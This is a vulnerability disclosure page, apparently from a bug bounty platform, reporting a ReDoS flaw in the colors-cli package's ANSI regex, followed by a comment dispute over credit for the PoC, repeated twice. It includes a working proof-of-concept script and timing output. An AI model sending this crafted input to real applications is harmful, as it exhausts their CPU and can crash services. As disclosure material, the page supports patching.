Inefficient Regular Expression Complexity in jaywcjlove/colors-cli

Valid

Reported on

Sep 11th 2021

✍️ Description

The colors-cli package is vulnerable to ReDoS (regular expression denial of service). An attacker that is able to provide crafted input to the ansi-regex functionality may cause an application to consume an excessive amount of CPU.

Below pinned line using vulnerable regex. The ReDOS is mainly due to the sub-patterns [\#;?]* and (?:;[a-zA-Z\d])

🕵️‍♂️ Proof of Concept

// PoC.js
var color = require('colors-cli/safe')
for(var i = 1; i <= 50000; i++) {
    var time = Date.now();
    var attack_str = "\u001B["+";".repeat(i*10000);
    color.red(attack_str)
    var time_cost = Date.now() - time;
    console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")
}

Check the output:

attack_str.length: 10002: 1132 ms
attack_str.length: 20002: 4162 ms
attack_str.length: 30002: 9244 ms
attack_str.length: 40002: 17362 ms
attack_str.length: 50002: 28197 ms
attack_str.length: 60002: 39578 ms
--
--

💥 Impact

This vulnerability is capable of exhausting system resources and leads to crashes. Ideally, it should take 0-10 milliseconds.

Occurrences

ansi-regex.js L5

We created a GitHub Issue asking the maintainers to create a SECURITY.md a year ago

ready-research submitted a

patch

a year ago

小弟调调™ marked this as fixed with commit 78ee15 a year ago

ready-research has been awarded the fix bounty

This vulnerability will not receive a CVE

ready-research

commented a year ago

Researcher

@jaywcjlove Thank you for your time and confirmation.

Yeting Li

commented a year ago

Hi @ready-research you directly use my PoC and patch like this (see the commit), this behavior is not very good. (cc@admin)

ready-research

commented a year ago

Researcher

@YetingLi I am following your work from long time. I am a fan of your work. Yeah using the publicly available exploit of your code to do other POC's which were not reported yet.

ready-research

commented a year ago

Researcher

@yetingli I am also using your tool https://github.com/yetingli/ReDoSHunter to generate "Attack String".

Sorry, I don't know that I need permission to use a POC/Patch/tool that is publicly available. I thought like if an issue is public we can use that without any permissions.

I am using your pattern to find REDOS vulnerabilities and also providing patches in GitHub for a long time.

Yeting Li

commented a year ago

I'm glad you can pay attention to my work and tools. I hope you can mention it next time you use my tool.

Yeting Li

commented a year ago

I'm glad you can pay attention to my work and tools. I hope you can cite it next time you use my tool.

ready-research

commented a year ago

Researcher

@yetingli Yeah sure I will credit you as well whenever I found an issue using your tools/pattern. Thanks for understanding.

ready-research

commented a year ago

Researcher

@yetingli By the way, I reported many issues today by following your tool/pattern. Thanks for such a useful tool.

Yeting Li

commented a year ago

@ready-research Okay, the reported issues should explictly acknowledge our work when submitting.

to join this conversation

We created a GitHub Issue asking the maintainers to create a SECURITY.md a year ago

ready-research submitted a

patch

a year ago

小弟调调™ marked this as fixed with commit 78ee15 a year ago

ready-research has been awarded the fix bounty

This vulnerability will not receive a CVE

ready-research

commented a year ago

Researcher

@jaywcjlove Thank you for your time and confirmation.

Yeting Li

commented a year ago

Hi @ready-research you directly use my PoC and patch like this (see the commit), this behavior is not very good. (cc@admin)

ready-research

commented a year ago

Researcher

@YetingLi I am following your work from long time. I am a fan of your work. Yeah using the publicly available exploit of your code to do other POC's which were not reported yet.

ready-research

commented a year ago

Researcher

@yetingli I am also using your tool https://github.com/yetingli/ReDoSHunter to generate "Attack String".

Sorry, I don't know that I need permission to use a POC/Patch/tool that is publicly available. I thought like if an issue is public we can use that without any permissions.

I am using your pattern to find REDOS vulnerabilities and also providing patches in GitHub for a long time.

Yeting Li

commented a year ago

I'm glad you can pay attention to my work and tools. I hope you can mention it next time you use my tool.

Yeting Li

commented a year ago

I'm glad you can pay attention to my work and tools. I hope you can cite it next time you use my tool.

ready-research

commented a year ago

Researcher

@yetingli Yeah sure I will credit you as well whenever I found an issue using your tools/pattern. Thanks for understanding.

ready-research

commented a year ago

Researcher

@yetingli By the way, I reported many issues today by following your tool/pattern. Thanks for such a useful tool.

Yeting Li

commented a year ago

@ready-research Okay, the reported issues should explictly acknowledge our work when submitting.

to join this conversation